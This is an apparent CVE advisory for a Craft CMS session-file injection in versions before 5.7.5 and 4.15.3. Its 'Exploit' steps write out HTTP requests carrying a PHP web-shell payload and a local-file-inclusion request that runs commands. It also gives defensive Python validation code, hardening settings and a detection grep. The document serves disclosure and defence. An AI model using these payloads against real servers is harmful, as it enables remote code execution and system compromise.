Craft CMS stores unsanitized user-provided content in its PHP session file, which lets an unauthenticated attacker write attacker-controlled bytes to disk on the server. When an unauthenticated user requests a protected page, Craft CMS redirects them to the login page and stores the originally requested URL in the session as the return URL, so that it can send the user back after login. PHP's default file session handler writes that session to a file named `sess_<session id>` in the session save path (commonly <code>/var/lib/php/sessions</code>). Because the return URL is stored without sanitization, an attacker can put arbitrary content, including PHP code, in the requested URL and have it written into the session file. By itself this is a file content injection; it becomes remote code execution (RCE) only when a second weakness lets the attacker include or otherwise execute the session file (for example a local file inclusion bug, or a session save path inside the web root). Patched versions (5.7.5 and 4.15.3) sanitize the stored `returnUrl` value.

<h2 style="color: blue;">DailyCVE Form</h2>
Platform: Craft CMS
Version: < 5.7.5, < 4.15.3
Vulnerability: Session File Injection
Severity: Moderate
Date: May 8, 2025

<h2 style="color: blue;">What Undercode Say:</h2>

<h2 style="color: blue;">Exploit:</h2>
1. Request a protected page with the payload in the URL, so that the URL becomes the stored return URL. The query string below is shown unencoded for readability; a real request line cannot contain spaces, and the page does not say whether the value lands on disk percent-encoded or decoded. The session cookie only chooses the file name, and the server honours a client-supplied ID only when PHP's session.use_strict_mode is off; otherwise the ID it picks is returned in the Set-Cookie response header, which names the file just as well:
[bash]
GET /admin?x="};<?php system($_GET['cmd']);?>// HTTP/1.1
Host: target.com
Cookie: CraftSessionId=injected
[/bash]
2. The session file (`sess_injected`) then holds the requested URL verbatim, so it contains:
[bash]
returnUrl="};<?php system($_GET['cmd']);?>//"
[/bash]
(The exact on-disk layout depends on PHP's serialize handler; with the default `php` handler the value is written as `returnUrl|s:<length>:"…";`. Bytes outside the `<?php ... ?>` tags are merely echoed if the file is ever included, so the surrounding record format does not matter.)
3. Execute it through a separate vulnerability, if one exists. The `page` parameter below stands for a hypothetical local file inclusion in the application or a plugin, not a Craft CMS endpoint:
[bash]
GET /index.php?page=/var/lib/php/sessions/sess_injected&cmd=id HTTP/1.1
[/bash]
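The following Python script is an added example, not code from Craft CMS or from this page's author. It reproduces what step 2 looks like once PHP's default `php` session serialize handler writes the session to disk, shows why a character-stripping filter in the style of FILTER_SANITIZE_URL (emulated here from the allowed-character list in the PHP manual) leaves the payload usable, and gives the kind of allowlist check that a return URL actually needs. The session key name `returnUrl`, the payload and the benign URL are constructed for the example.

```python
"""Added example (not Craft CMS code): how the page's payload looks on disk under
PHP's default 'php' session serializer, why FILTER_SANITIZE_URL-style stripping
does not neutralise it, and an allowlist check that does. The key name
'returnUrl', PAYLOAD and BENIGN are constructed for this example."""
import re

# Constructed inputs: the page's step-2 payload as it would arrive in the
# requested URL, and an ordinary control-panel URL.
PAYLOAD = "/admin?x=\"};<?php system($_GET['cmd']);?>//"
BENIGN = "/admin/entries?page=2"


def php_session_record(session: dict) -> str:
    """Encode a dict of string values the way PHP's 'php' serialize handler
    writes $_SESSION to sess_<id>: key|s:<byte length>:"<bytes>"; per entry,
    entries concatenated. Quotes are not escaped; the length prefix delimits."""
    parts = []
    for key, value in session.items():
        parts.append(f'{key}|s:{len(value.encode("utf-8"))}:"{value}";')
    return "".join(parts)


# Characters FILTER_SANITIZE_URL keeps, per the PHP manual: letters, digits and
# $-_.+!*'(),{}|\^~[]`<>#%";/?:@&=   so '<', '?', '(', quotes and ';' survive.
_SANITIZE_URL_KEEP = set("$-_.+!*'(),{}|\\^~[]`<>#%\";/?:@&=")


def filter_sanitize_url(value: str) -> str:
    """Emulate PHP's FILTER_SANITIZE_URL: drop everything not in the keep set."""
    return "".join(c for c in value
                   if (c.isascii() and c.isalnum()) or c in _SANITIZE_URL_KEEP)


# Allowlist for a site-relative return URL: one leading '/', then only the
# unreserved characters plus a few sub-delimiters and path/query characters.
# No '<', '>', quotes, brackets, braces, '$', '(' ')' or whitespace, so no PHP
# syntax can fit in an accepted value.
_SAFE_PATH = re.compile(r"/(?!/)[A-Za-z0-9._~%!*+,;=:@/?&-]*")


def safe_return_url(candidate: str, default: str = "/") -> str:
    """Return candidate if it is a site-relative path, otherwise the default.
    Rejects absolute URLs, protocol-relative '//host' URLs and any character
    a site-relative URL does not need (which covers the whole payload)."""
    if _SAFE_PATH.fullmatch(candidate):
        return candidate
    return default


if __name__ == "__main__":
    print(php_session_record({"returnUrl": PAYLOAD}))
    print(filter_sanitize_url(PAYLOAD))      # spaces gone, '<?php' still present
    print(safe_return_url(PAYLOAD), safe_return_url(BENIGN))
```

`safe_return_url` deliberately does not percent-decode: it judges the bytes that would be stored, and a site-relative path needs none of `<`, `>`, quotes, brackets or whitespace, so rejecting them costs nothing.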
Protection:
1. Update to Craft CMS 5.7.5 or 4.15.3 (or later). This is the fix; the remaining items only limit what an attacker gains from an unpatched install.
2. Keep the session directory private to the PHP worker user and outside the web root, so that nothing serves or reads the files directly:
chmod 700 /var/lib/php/sessions
3. Validate the return URL rather than "sanitizing" it, wherever the value comes from (the requested URL or a `returnUrl` parameter): accept only a site-relative path (one leading slash, no scheme or host, a small allowlist of URL characters) and fall back to a fixed default otherwise. A character filter is not enough; PHP's FILTER_SANITIZE_URL strips whitespace but keeps `<`, `>`, `?`, `(`, `)`, `;` and quotes, so the payload above survives it nearly intact:
$returnUrl = filter_var($_GET['returnUrl'], FILTER_SANITIZE_URL); // insufficient on its own
4. Harden PHP so that an include cannot reach the session directory, and confirm that sessions still work afterwards:
open_basedir = /var/www:/tmp
Changing session.serialize_handler (for example to php_serialize) only alters the record format; the injected bytes are written either way, so it is not a mitigation.
Detection:
Scan the session directory for PHP open tags. Session files are created mode 0600, so run this as root or as the PHP worker user; the pattern also catches the short echo tag `<?=`:
grep -rlE '<\?(php|=)' /var/lib/php/sessions/
Mitigation:
Disable PHP's session auto-start if the application does not rely on it. This does not stop the injection (the session is started when the return URL is stored), but it stops PHP from creating a session file for every request:
session.auto_start = 0
Reported By: github.com